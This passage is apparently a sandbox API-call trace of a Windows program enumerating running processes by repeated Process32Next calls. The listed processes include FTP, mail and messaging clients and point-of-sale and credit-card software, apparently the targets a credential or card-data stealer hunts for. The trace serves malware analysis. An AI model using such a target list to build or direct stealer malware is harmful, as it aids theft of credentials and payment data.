hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.532] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0246.533] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0246.535] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0246.536] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0246.537] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0246.539] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.540] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0246.548] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0246.549] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0246.550] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0246.552] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0246.553] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0246.555] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0246.556] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0246.558] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0246.562] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0246.564] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0246.565] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0246.566] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0246.568] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0246.569] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0246.570] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0246.572] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0246.576] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0246.578] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0246.579] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0246.581] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0246.582] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0246.583] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0246.585] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0246.586] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0246.587] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0246.595] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0246.596] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0246.598] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0246.599] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0246.601] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0246.603] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0246.605] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0246.609] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0246.611] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0246.612] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0246.614] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0246.616] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0246.617] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0246.619] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0246.624] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0246.625] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0246.627] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0246.629] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0246.630] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0246.683] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0246.688] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0246.691] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0246.693] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0246.695] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0246.696] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0246.702] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0246.704] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0246.706] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0246.707] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0246.709] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0246.710] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0246.712] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0246.717] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0246.718] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0246.720] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0246.721] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0246.723] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0246.730] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0246.732] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0246.733] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0246.735] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0246.736] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0246.737] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0246.739] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0246.740] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0246.742] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0246.744] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0246.748] CloseHandle (hObject=0x1b08) returned 1 [0246.748] Sleep (dwMilliseconds=0x64) [0246.858] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0246.867] Process32First (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0246.868] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0246.873] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0246.874] Process32Next (in: hSnapshot=0x1b08, 